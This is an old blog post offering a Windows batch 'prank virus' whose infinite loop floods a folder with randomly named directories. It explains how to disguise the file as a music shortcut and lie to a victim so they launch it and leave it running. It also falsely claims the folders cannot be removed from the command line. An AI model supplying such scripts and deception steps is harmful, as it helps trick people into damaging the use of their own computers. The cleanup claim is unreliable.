Virus - Making over 1000 folders in a few seconds

Posted by Junaid July 19, 2010



Make over 1,000 folders in few seconds
Here you will learn a simple prank that will make an unlimited amount of folders in any place you want.

Step 1
Open notepad and type:

@echo off
:top
md %random%
goto top

@echo off makes it so that it appears to be a blank screen but actually it’s making hundreds of folder.

md %random% is command that creating folders with random names.

goto top – return to label :top , infinite loop

Step 2
Save it as 1000folders.bat
After that you will get icon that contain some type of wheels in it…
People probably not going to click on an icon that looks like that so to make it better (funnier and easier to prank people with) make a short-cut to it

Step 3
Right click on icon and click Create Shortcut

Step 4

Right click on shortcut and click properties, then click on Change Icon and rename icon
(Better if you changed the icon to a music icon)

tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized

something’s wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…

blog comments powered by Disqus
Subscribe To Guide 29

Enter your email address:

Delivered by FeedBurner

Join On Social Networks
  • Subscribe to RSS feed
  • Become Fan On FB
  • Follow Updates on Twitter
  • Be A Friend on Digg
  • Follow On SU

Become A Fan

Tags